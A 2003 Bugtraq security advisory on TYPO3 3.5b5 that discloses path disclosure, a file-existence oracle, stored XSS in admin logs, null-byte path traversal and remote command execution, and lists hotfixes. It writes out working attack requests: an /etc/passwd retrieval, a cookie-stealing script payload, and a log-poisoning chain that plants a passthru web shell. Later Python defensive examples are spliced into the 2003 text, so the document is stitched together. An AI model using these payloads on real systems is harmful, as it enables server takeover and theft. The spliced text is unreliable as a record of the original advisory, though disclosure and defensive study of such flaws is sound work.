[29094] in bugtraq
typo3 issues
daemon@ATHENA.MIT.EDU (Martin Eiszner)
Fri Feb 28 12:53:20 2003
Date: Fri, 28 Feb 2003 10:37:04 +0100
From: Martin Eiszner <martin@websec.org>
To: bugtraq@securityfocus.com
Message-Id: <20030228103704.1b657228.martin@websec.org>
hola, ...
2002@WebSec.org/Martin Eiszner
=====================
Security REPORT TYPO3
=====================
this document: http://www.websec.org/adv/typo3.html
Product: Typo3 (Version 3.5b5 / Earlier versions are possibly vulnerable too)
Vendor: Typo3 (http://www.typo3.com)
Vendor-Status: kasper@typo3.com informed / new version OUT
Vendor-Patch: http://typo3.org/1331.0.html
Local: NO
Remote: YES
Vulnerabilities:
-path-disclosure
-proof of file-existence
-arbitrary file retrieval
-arbitrary command execution
-CrossSiteScripting / privilege escalation / cookie-theft
-install/config files and scripts within webroot
Severity: MEDIUM to HIGH
Tested Platforms: Linux / Slackware i686 / Apache 1.3.23 / PHP 4.1.2
============
Introduction
============
Taken from http://www.typo3.com
TYPO3 is a free Open Source content management system for enterprise purposes
on the web and in intranets. It offers full flexibility and extendability while
featuring an accomplished set of ready-made interfaces, functions and modules.
=====================
Vulnerability Details
=====================
0) CLIENT-SIDE DATA-OBFUSCATION
form-fields are obfuscated using client-side java-script routines.
after the fields are joined a java-script creates MD5-hashes and
submits the form.
examples: index.php (account-data), showpic.php(name-checksum)
attached perl-scripts (typo.pl/showpic.pl) demonstrate how to circumvent
this protection.
1) PATH-DISCLOSURE
several test-, class- and library-scripts can be found within webroot.
some of them can be forced to produce runtime errors and output their
physical path.
example: /fileadmin/include_test.php
2) PROOF OF FILE-EXISTENCE
"showpic.php" and "thumbs.php" allow an attacker to check the existence of
arbitrary files.
combined with file-enumeration methods it is possible to reconstruct parts
of the directory and filesystem structure.
example of how to check for existing files with the attached perl-script "showpic.pl":
---*---
sh> showpic.pl localhost '../../../../../../../../../../etc/hosts'
../../../../../../../../../../etc/hosts exists
---*---
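Items 0) and 2) share one root cause: the checksum is computed by the client, so it authenticates nothing, and the script's answer then reveals whether a file exists. The following is an added example, not code from the advisory or from TYPO3, sketching the server-side alternative in Python for illustration: a keyed tag, path confinement and a uniform error. SERVER_KEY, IMAGE_ROOT and all function names are hypothetical.

```python
import hashlib
import hmac
import os
import posixpath

SERVER_KEY = b"constructed-demo-key"   # assumption: secret that never leaves the server
IMAGE_ROOT = "/var/www/site/uploads"   # hypothetical directory the script may serve from


def client_style_checksum(name):
    """Unkeyed digest: anyone who knows the algorithm can compute it for any name."""
    return hashlib.md5(name.encode()).hexdigest()


def sign(name):
    """Keyed tag issued by the server when it generates a link to a file."""
    return hmac.new(SERVER_KEY, name.encode(), hashlib.sha256).hexdigest()


def resolve(name, tag):
    """Return the confined absolute path, or None if the request must be refused."""
    if "\x00" in name:
        return None
    if not hmac.compare_digest(sign(name).encode(), tag.encode()):
        return None
    full = posixpath.normpath(posixpath.join(IMAGE_ROOT, name))
    # Defence in depth: even a validly signed name may not leave IMAGE_ROOT.
    if not full.startswith(IMAGE_ROOT + "/"):
        return None
    return full


def serve(name, tag, exists=os.path.isfile):
    """Same answer for bad tag, escaped path and missing file: no existence oracle."""
    path = resolve(name, tag)
    if path is None or not exists(path):
        return (404, "not found")
    return (200, path)
```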
3) CROSS SITE SCRIPTING / COOKIE-THEFT
all system and login-errors are saved in the typo3-database.
administrators can view all the erroneous data.
since this data is not being checked for XSS-content it is possible to include
client-side script (java-script) tags in these entries.
every time the admins view their logs these scripts will be run in the admin's
web-browser, which leads to a typical XSS-bug.
this makes it possible to steal the admin's cookies or let him open a new
user-account without his knowledge.
example with the attached "typo.pl" - perlscript:
---*---
sh> typo.pl localhost '><script>alert(document.cookie)</script><:aaa'
---*---
viewing the logfiles will execute the script.
4) ARBITRARY FILE-RETRIEVAL
the "dev/translations.php" script does not check the
ONLY-parameter for malicious values.
a relative path combined with a null byte leads to the inclusion of the
given file.
example http-request:
---*---
GET http://host/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
---*---
5) ARBITRARY COMMAND EXECUTION
extends vulnerability number 4):
if the included file contains php-source code it will be executed,
thus allowing an attacker to execute operating-system commands and
in the long run escalate his privileges.
example:
---*---
a file for placing our malicious php-source is needed.
if there is no file we have write-access to, we can still use the webserver's logfiles.
the following http-request:
---cut---
http://localhost/<%3f %60echo %27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f>
---cut---
creates this entry:
---cut---
[Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File does not exist: /apachepath/apache/htdocs/<? `echo '<?passthru(\$c)?>' >> ./x.php` ?>
---cut---
in a typical apache error_log file.
using the method discussed under 4) the following http-request:
---cut---
http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00'
---cut---
will include the apache error_log in our output and execute our php-commands.
as a result we will find x.php in our "/dev" directory.
x.php:
---cut---
<?passthru($c)?>
---cut---
---*---
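For defenders reviewing web-server logs, the requests described under 4) and 5) leave recognisable traces: a "translations.php" request whose ONLY value contains a traversal segment or a null byte, and a PHP open tag inside a requested URL. The following detection sketch is an added example, not part of the original advisory; the log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines for illustration (not taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jan/2003:19:40:01 +0100] "GET /typo3/dev/translations.php?ONLY=de HTTP/1.0" 200 5120',
    '192.0.2.66 - - [14/Jan/2003:19:41:12 +0100] "GET /dev/translations.php?ONLY=%2e%2e/%2e%2e/etc/passwd%00 HTTP/1.0" 200 1432',
    '192.0.2.66 - - [14/Jan/2003:19:42:53 +0100] "GET /%3C%3F%20echo%201%20%3F%3E HTTP/1.0" 404 210',
    '192.0.2.10 - - [14/Jan/2003:19:43:00 +0100] "GET /index.php?id=12 HTTP/1.0" 200 8841',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (.*?) HTTP/[\d.]+"')
PHP_TAG_RE = re.compile(r"<\?")

def full_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is seen in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the list of findings for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    target = match.group(1)
    findings = []
    # A PHP open tag in a request ends up verbatim in the server's logs.
    if PHP_TAG_RE.search(full_decode(target)):
        findings.append("php-tag-in-request")
    parts = urlsplit(target)
    if full_decode(parts.path).endswith("/dev/translations.php"):
        for raw in parse_qs(parts.query, keep_blank_values=True).get("ONLY", []):
            value = full_decode(raw)
            if ".." in value.replace("\\", "/").split("/"):
                findings.append("traversal-in-ONLY")
            if "\x00" in value:
                findings.append("null-byte-in-ONLY")
    return findings

def scan(lines):
    """Map 1-based line number to findings, skipping clean lines."""
    results = ((n, classify(l)) for n, l in enumerate(lines, 1))
    return {n: f for n, f in results if f}
```

Any hit on "translations.php" in a production log is also a sign that the "/dev" directory is still deployed.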
6) SCRIPTS AND DIRECTORIES IN WEBROOT
a couple of scripts, libraries, files and directories can be found within typo3's
webroot.
"/install" is improperly protected and vulnerable to brute-force attacks.
"/fileadmin" directory reveals log-files and demo-scripts
"/typo3conf" directory contains the localconf.php,database.sql and other sensitive files
=======
Remarks
=======
the serious vulnerabilities rely on the "/dev" (developer?) - directory.
scripts within this directory can be found in many/most production-environments!
====================
Recommended Hotfixes
====================
overall) install the new Version !
or
1) remove "/install" directory
2) remove "/dev" directory
3) Choose strong administrator-passwords
4) showpic.php and thumbs.php must be patched.
5) remove all demo-directories and protect "/fileadmin" and "/typo3conf"
EOF Martin Eiszner / @2002WebSec.org
=======
Contact
=======
--
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
tel: 0043 699 121772 37
--Multipart_Fri__28_Feb_2003_10:37:04_+0100_082260a0
Content-Type: application/octet-stream;
name="typo.pl"
Content-Disposition: attachment;
filename="typo.pl"
Content-Transfer-Encoding: base64
--Multipart_Fri__28_Feb_2003_10:37:04_+0100_082260a0
Content-Type: application/octet-stream;
name="showpic.pl"
Content-Disposition: attachment;
filename="showpic.pl"
Content-Transfer-Encoding: base64
--Multipart_Fri__28_Feb_2003_10:37:04_+0100_082260a0--